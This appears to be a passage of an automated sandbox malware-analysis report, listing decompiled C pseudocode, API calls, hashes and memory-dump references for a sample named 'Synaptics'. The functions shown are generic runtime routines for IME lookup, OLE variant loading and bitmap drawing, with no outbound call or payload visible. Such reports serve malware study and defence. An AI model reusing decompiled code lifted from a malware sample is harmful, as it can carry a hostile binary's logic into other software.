                                                                                                                                                                                          0x00445f57
                                                                                                                                                                                          0x00445f58
                                                                                                                                                                                          0x00445f5d
                                                                                                                                                                                          0x00445f60
                                                                                                                                                                                          0x00445f6a
                                                                                                                                                                                          0x00445f83
                                                                                                                                                                                          0x00445f83
                                                                                                                                                                                          0x00445f8f
                                                                                                                                                                                          0x00445f9f
                                                                                                                                                                                          0x00445fab
                                                                                                                                                                                          0x00445fb6
                                                                                                                                                                                          0x00445fc1
                                                                                                                                                                                          0x00445fcb
                                                                                                                                                                                          0x00445fd6
                                                                                                                                                                                          0x00445fe0
                                                                                                                                                                                          0x00445feb
                                                                                                                                                                                          0x00445ff5
                                                                                                                                                                                          0x00446000
                                                                                                                                                                                          0x0044600a
                                                                                                                                                                                          0x00446015
                                                                                                                                                                                          0x0044601f
                                                                                                                                                                                          0x0044602a
                                                                                                                                                                                          0x00446034
                                                                                                                                                                                          0x0044603f
                                                                                                                                                                                          0x00446049
                                                                                                                                                                                          0x00446054
                                                                                                                                                                                          0x0044605e
                                                                                                                                                                                          0x00446069
                                                                                                                                                                                          0x00446073
                                                                                                                                                                                          0x0044607e
                                                                                                                                                                                          0x0044607e
                                                                                                                                                                                          0x00445fab
                                                                                                                                                                                          0x00446085
                                                                                                                                                                                          0x00446088
                                                                                                                                                                                          0x0044608b
                                                                                                                                                                                          0x00446099
                                                                                                                                                                                          0x00446099

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                                                                                                                                                          • SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                                                                                                                          • String ID: DI$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                                                                                                                                                                          • API String ID: 3397921170-1483999256
                                                                                                                                                                                          • Opcode ID: 9fa87858faccd4e9ee72812708169b79f1c614ba298ecca0aaf94dd97211590c
                                                                                                                                                                                          • Instruction ID: ef3ad77a40a7235546353be2f7b1bc646a7dfd85628d1f60096bddc463f7a869
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fa87858faccd4e9ee72812708169b79f1c614ba298ecca0aaf94dd97211590c
                                                                                                                                                                                          • Instruction Fuzzy Hash: E7315470948340AFE700EBB6FD56B1A37A9E325704B11863BB5019BAD3D77D68009F5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F7D0 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040F7D0() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x49e7a4 = E0040F7A4("VariantChangeTypeEx", E0040F340, _t91);
				 *0x49e7a8 = E0040F7A4("VarNeg", E0040F370, _t91);
				 *0x49e7ac = E0040F7A4("VarNot", E0040F370, _t91);
				 *0x49e7b0 = E0040F7A4("VarAdd", E0040F37C, _t91);
				 *0x49e7b4 = E0040F7A4("VarSub", E0040F37C, _t91);
				 *0x49e7b8 = E0040F7A4("VarMul", E0040F37C, _t91);
				 *0x49e7bc = E0040F7A4("VarDiv", E0040F37C, _t91);
				 *0x49e7c0 = E0040F7A4("VarIdiv", E0040F37C, _t91);
				 *0x49e7c4 = E0040F7A4("VarMod", E0040F37C, _t91);
				 *0x49e7c8 = E0040F7A4("VarAnd", E0040F37C, _t91);
				 *0x49e7cc = E0040F7A4("VarOr", E0040F37C, _t91);
				 *0x49e7d0 = E0040F7A4("VarXor", E0040F37C, _t91);
				 *0x49e7d4 = E0040F7A4("VarCmp", E0040F388, _t91);
				 *0x49e7d8 = E0040F7A4("VarI4FromStr", E0040F394, _t91);
				 *0x49e7dc = E0040F7A4("VarR4FromStr", E0040F400, _t91);
				 *0x49e7e0 = E0040F7A4("VarR8FromStr", E0040F46C, _t91);
				 *0x49e7e4 = E0040F7A4("VarDateFromStr", E0040F4D8, _t91);
				 *0x49e7e8 = E0040F7A4("VarCyFromStr", E0040F544, _t91);
				 *0x49e7ec = E0040F7A4("VarBoolFromStr", E0040F5B0, _t91);
				 *0x49e7f0 = E0040F7A4("VarBstrFromCy", E0040F630, _t91);
				 *0x49e7f4 = E0040F7A4("VarBstrFromDate", E0040F6A0, _t91);
				_t46 = E0040F7A4("VarBstrFromBool", E0040F710, _t91);
				 *0x49e7f8 = _t46;
				return _t46;
			}






                                                                                                                                                                                          0x0040f7de
                                                                                                                                                                                          0x0040f7f2
                                                                                                                                                                                          0x0040f808
                                                                                                                                                                                          0x0040f81e
                                                                                                                                                                                          0x0040f834
                                                                                                                                                                                          0x0040f84a
                                                                                                                                                                                          0x0040f860
                                                                                                                                                                                          0x0040f876
                                                                                                                                                                                          0x0040f88c
                                                                                                                                                                                          0x0040f8a2
                                                                                                                                                                                          0x0040f8b8
                                                                                                                                                                                          0x0040f8ce
                                                                                                                                                                                          0x0040f8e4
                                                                                                                                                                                          0x0040f8fa
                                                                                                                                                                                          0x0040f910
                                                                                                                                                                                          0x0040f926
                                                                                                                                                                                          0x0040f93c
                                                                                                                                                                                          0x0040f952
                                                                                                                                                                                          0x0040f968
                                                                                                                                                                                          0x0040f97e
                                                                                                                                                                                          0x0040f994
                                                                                                                                                                                          0x0040f9aa
                                                                                                                                                                                          0x0040f9ba
                                                                                                                                                                                          0x0040f9c0
                                                                                                                                                                                          0x0040f9c7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040F7D9
                                                                                                                                                                                            • Part of subcall function 0040F7A4: GetProcAddress.KERNEL32(00000000), ref: 0040F7BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                          • API String ID: 1646373207-1918263038
                                                                                                                                                                                          • Opcode ID: 80ab367ea45039dbd2bc01dee9e52f96cbb8d261e3d937e86e9258942a4f4849
                                                                                                                                                                                          • Instruction ID: 068c6e066db7a12a78cda71ceaebb25bc6294a0e525a49770a7ca0196cea08b9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 80ab367ea45039dbd2bc01dee9e52f96cbb8d261e3d937e86e9258942a4f4849
                                                                                                                                                                                          • Instruction Fuzzy Hash: 84411E656042049AD334EBAF794142A73C8D7D4724364C07FB804EBEE5DB7DA8498A2F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00426204 Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 52%
                                                                                                                                                                                          			E00426204(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x49de34; // 0x49b0ec
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L004072E0();
					_v20 = E00426060(0);
					_push(_t177);
					_push(0x426484);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L004072D8();
					_v24 = E00426060(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x49e894; // 0x790806c5
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L00407440();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L00407440();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x49e894; // 0x790806c5
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L00407440();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L00407440();
						_v40 = _t135;
					}
					_push(_v20);
					L00407418();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(0x42648b);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L00407440();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L004072D8();
					_v24 = E00426060(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x4262d7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407A44(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(0x42648b);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}


























                                                                                                                                                                                          0x00426205
                                                                                                                                                                                          0x00426207
                                                                                                                                                                                          0x0042620d
                                                                                                                                                                                          0x00426210
                                                                                                                                                                                          0x00426213
                                                                                                                                                                                          0x00426215
                                                                                                                                                                                          0x00426218
                                                                                                                                                                                          0x0042621b
                                                                                                                                                                                          0x0042621f
                                                                                                                                                                                          0x00426227
                                                                                                                                                                                          0x004262e0
                                                                                                                                                                                          0x004262e3
                                                                                                                                                                                          0x004262e5
                                                                                                                                                                                          0x004262ef
                                                                                                                                                                                          0x004262f4
                                                                                                                                                                                          0x004262f5
                                                                                                                                                                                          0x004262fa
                                                                                                                                                                                          0x004262fd
                                                                                                                                                                                          0x00426300
                                                                                                                                                                                          0x00426301
                                                                                                                                                                                          0x00426305
                                                                                                                                                                                          0x00426306
                                                                                                                                                                                          0x00426310
                                                                                                                                                                                          0x00426320
                                                                                                                                                                                          0x00426323
                                                                                                                                                                                          0x00426325
                                                                                                                                                                                          0x0042632a
                                                                                                                                                                                          0x0042632b
                                                                                                                                                                                          0x0042632e
                                                                                                                                                                                          0x0042632f
                                                                                                                                                                                          0x00426334
                                                                                                                                                                                          0x00426337
                                                                                                                                                                                          0x0042633c
                                                                                                                                                                                          0x00426340
                                                                                                                                                                                          0x00426341
                                                                                                                                                                                          0x0042634a
                                                                                                                                                                                          0x00426360
                                                                                                                                                                                          0x00426362
                                                                                                                                                                                          0x00426367
                                                                                                                                                                                          0x00426368
                                                                                                                                                                                          0x0042636b
                                                                                                                                                                                          0x0042636c
                                                                                                                                                                                          0x00426371
                                                                                                                                                                                          0x0042634c
                                                                                                                                                                                          0x0042634c
                                                                                                                                                                                          0x00426351
                                                                                                                                                                                          0x00426352
                                                                                                                                                                                          0x00426355
                                                                                                                                                                                          0x00426356
                                                                                                                                                                                          0x0042635b
                                                                                                                                                                                          0x0042635b
                                                                                                                                                                                          0x00426377
                                                                                                                                                                                          0x00426378
                                                                                                                                                                                          0x0042639a
                                                                                                                                                                                          0x004263bc
                                                                                                                                                                                          0x004263c9
                                                                                                                                                                                          0x004263d7
                                                                                                                                                                                          0x004263fe
                                                                                                                                                                                          0x00426423
                                                                                                                                                                                          0x0042642d
                                                                                                                                                                                          0x00426437
                                                                                                                                                                                          0x00426440
                                                                                                                                                                                          0x0042644a
                                                                                                                                                                                          0x0042644a
                                                                                                                                                                                          0x00426453
                                                                                                                                                                                          0x0042645a
                                                                                                                                                                                          0x0042645d
                                                                                                                                                                                          0x00426460
                                                                                                                                                                                          0x00426469
                                                                                                                                                                                          0x0042646b
                                                                                                                                                                                          0x00426470
                                                                                                                                                                                          0x00426474
                                                                                                                                                                                          0x00426475
                                                                                                                                                                                          0x00426475
                                                                                                                                                                                          0x00426483
                                                                                                                                                                                          0x0042623f
                                                                                                                                                                                          0x0042623f
                                                                                                                                                                                          0x00426241
                                                                                                                                                                                          0x00426246
                                                                                                                                                                                          0x00426247
                                                                                                                                                                                          0x00426251
                                                                                                                                                                                          0x00426261
                                                                                                                                                                                          0x00426266
                                                                                                                                                                                          0x00426267
                                                                                                                                                                                          0x0042626c
                                                                                                                                                                                          0x0042626f
                                                                                                                                                                                          0x004262ab
                                                                                                                                                                                          0x004262b2
                                                                                                                                                                                          0x004262b5
                                                                                                                                                                                          0x004262b8
                                                                                                                                                                                          0x004262ca
                                                                                                                                                                                          0x004262d6
                                                                                                                                                                                          0x004262d6

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73CCA520.GDI32(?,00000001,00000001), ref: 00426247
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0042625C
                                                                                                                                                                                          • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,004262D7,?,?), ref: 004262AB
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 004262C5
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004262D1
                                                                                                                                                                                          • 73CCA590.GDI32(00000000), ref: 004262E5
                                                                                                                                                                                          • 73CCA520.GDI32(?,?,?,00000000,00426484,?,00000000), ref: 00426306
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0042631B
                                                                                                                                                                                          • 73CCB410.GDI32(?,790806C5,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 0042632F
                                                                                                                                                                                          • 73CCB410.GDI32(?,?,00000000,?,790806C5,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 00426341
                                                                                                                                                                                          • 73CCB410.GDI32(?,00000000,000000FF,?,?,00000000,?,790806C5,00000000,?,?,?,?,?,00000000,00426484), ref: 00426356
                                                                                                                                                                                          • 73CCB410.GDI32(?,790806C5,000000FF,?,?,00000000,?,790806C5,00000000,?,?,?,?,?,00000000,00426484), ref: 0042636C
                                                                                                                                                                                          • 73CCB150.GDI32(?,?,790806C5,000000FF,?,?,00000000,?,790806C5,00000000,?,?,?,?,?,00000000), ref: 00426378
                                                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042639A
                                                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 004263BC
                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004263C4
                                                                                                                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004263D2
                                                                                                                                                                                          • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004263FE
                                                                                                                                                                                          • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426423
                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 0042642D
                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00426437
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0042644A
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00426453
                                                                                                                                                                                          • 73CCB410.GDI32(?,00000000,00000000,0042648B,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00426475
                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 0042647E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3348367721-0
                                                                                                                                                                                          • Opcode ID: 51e273fba67bde6babbdc730237f11150b88246f786cee28d1dbe93902eef5d4
                                                                                                                                                                                          • Instruction ID: aac08ee918962813e68096157f6589243fc941b0343c0b747259aa04d8bf8f88
                                                                                                                                                                                          • Opcode Fuzzy Hash: 51e273fba67bde6babbdc730237f11150b88246f786cee28d1dbe93902eef5d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7681A6B1A44218AFDB50EE99CD81FAF7BECAB0D714F510559FA18F7281C238AD008B75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00429708 Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                          			E00429708(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00428BFC(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x429903);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L00407638();
					_v12 = E00426060(0);
					_push(_v12);
					L004072E0();
					_v20 = E00426060(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L004072C8();
					_v8 = _t64;
					if(_v8 == 0) {
						L17:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(0x42990a);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L00407888();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L004072E0();
							_v16 = E00426060(_v12);
							_push(_t127);
							_push(0x4298bb);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E00429040(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L00407440();
								_push(_v16);
								L00407418();
								_push(0);
								_push(_t123);
								_push(_v20);
								L00407440();
								_push(_v20);
								L00407418();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L004072B8();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x4298c2);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}



























                                                                                                                                                                                          0x00429709
                                                                                                                                                                                          0x0042970b
                                                                                                                                                                                          0x00429711
                                                                                                                                                                                          0x00429713
                                                                                                                                                                                          0x00429715
                                                                                                                                                                                          0x00429719
                                                                                                                                                                                          0x0042971e
                                                                                                                                                                                          0x00429913
                                                                                                                                                                                          0x00429738
                                                                                                                                                                                          0x0042973a
                                                                                                                                                                                          0x00429741
                                                                                                                                                                                          0x00429746
                                                                                                                                                                                          0x0042974b
                                                                                                                                                                                          0x0042974c
                                                                                                                                                                                          0x00429751
                                                                                                                                                                                          0x00429754
                                                                                                                                                                                          0x00429757
                                                                                                                                                                                          0x00429759
                                                                                                                                                                                          0x00429763
                                                                                                                                                                                          0x00429769
                                                                                                                                                                                          0x0042976a
                                                                                                                                                                                          0x00429774
                                                                                                                                                                                          0x00429777
                                                                                                                                                                                          0x00429779
                                                                                                                                                                                          0x0042977b
                                                                                                                                                                                          0x00429780
                                                                                                                                                                                          0x00429781
                                                                                                                                                                                          0x00429784
                                                                                                                                                                                          0x00429785
                                                                                                                                                                                          0x0042978a
                                                                                                                                                                                          0x00429791
                                                                                                                                                                                          0x004298d5
                                                                                                                                                                                          0x004298d5
                                                                                                                                                                                          0x004298d7
                                                                                                                                                                                          0x004298da
                                                                                                                                                                                          0x004298dd
                                                                                                                                                                                          0x004298e6
                                                                                                                                                                                          0x004298ec
                                                                                                                                                                                          0x004298ec
                                                                                                                                                                                          0x004298f5
                                                                                                                                                                                          0x004298f7
                                                                                                                                                                                          0x004298fa
                                                                                                                                                                                          0x004298fb
                                                                                                                                                                                          0x004298fd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004298fd
                                                                                                                                                                                          0x00429902
                                                                                                                                                                                          0x00429797
                                                                                                                                                                                          0x004297a4
                                                                                                                                                                                          0x004297ad
                                                                                                                                                                                          0x004297ce
                                                                                                                                                                                          0x004297cf
                                                                                                                                                                                          0x004297d9
                                                                                                                                                                                          0x004297de
                                                                                                                                                                                          0x004297df
                                                                                                                                                                                          0x004297e4
                                                                                                                                                                                          0x004297e7
                                                                                                                                                                                          0x004297ee
                                                                                                                                                                                          0x0042980e
                                                                                                                                                                                          0x004297f0
                                                                                                                                                                                          0x004297f0
                                                                                                                                                                                          0x004297f6
                                                                                                                                                                                          0x0042980a
                                                                                                                                                                                          0x0042980a
                                                                                                                                                                                          0x0042981c
                                                                                                                                                                                          0x00429821
                                                                                                                                                                                          0x00429823
                                                                                                                                                                                          0x00429825
                                                                                                                                                                                          0x00429829
                                                                                                                                                                                          0x0042982a
                                                                                                                                                                                          0x00429832
                                                                                                                                                                                          0x00429833
                                                                                                                                                                                          0x00429838
                                                                                                                                                                                          0x0042983a
                                                                                                                                                                                          0x0042983e
                                                                                                                                                                                          0x0042983f
                                                                                                                                                                                          0x00429847
                                                                                                                                                                                          0x00429848
                                                                                                                                                                                          0x00429848
                                                                                                                                                                                          0x00429852
                                                                                                                                                                                          0x00429859
                                                                                                                                                                                          0x0042985e
                                                                                                                                                                                          0x00429860
                                                                                                                                                                                          0x00429865
                                                                                                                                                                                          0x00429869
                                                                                                                                                                                          0x0042986d
                                                                                                                                                                                          0x0042986e
                                                                                                                                                                                          0x00429870
                                                                                                                                                                                          0x00429875
                                                                                                                                                                                          0x00429876
                                                                                                                                                                                          0x00429880
                                                                                                                                                                                          0x00429889
                                                                                                                                                                                          0x00429893
                                                                                                                                                                                          0x00429893
                                                                                                                                                                                          0x0042989c
                                                                                                                                                                                          0x0042989f
                                                                                                                                                                                          0x0042989f
                                                                                                                                                                                          0x004298a6
                                                                                                                                                                                          0x004298a9
                                                                                                                                                                                          0x004298ac
                                                                                                                                                                                          0x004298ba
                                                                                                                                                                                          0x004297af
                                                                                                                                                                                          0x004297c1
                                                                                                                                                                                          0x004298c6
                                                                                                                                                                                          0x004298d0
                                                                                                                                                                                          0x004298d0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004298c6
                                                                                                                                                                                          0x004297ad
                                                                                                                                                                                          0x00429791

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetObjectA.GDI32(?,00000054,?), ref: 0042972B
                                                                                                                                                                                          • 73CCAC50.USER32(00000000,00000000,00429903,?,?,00000054,?), ref: 00429759
                                                                                                                                                                                          • 73CCA590.GDI32(?,00000000,00000000,00429903,?,?,00000054,?), ref: 0042976A
                                                                                                                                                                                          • 73CCA410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,00429903,?,?,00000054,?), ref: 00429785
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0042979F
                                                                                                                                                                                          • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 004297C1
                                                                                                                                                                                          • 73CCA590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,00429903,?,?,00000054,?), ref: 004297CF
                                                                                                                                                                                          • SelectObject.GDI32(?), ref: 00429817
                                                                                                                                                                                          • 73CCB410.GDI32(?,?,00000000,?,?,00000000,004298BB,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 0042982A
                                                                                                                                                                                          • 73CCB150.GDI32(?,?,?,00000000,?,?,00000000,004298BB,?,?,?,00000000,?,?,00000001,00000001), ref: 00429833
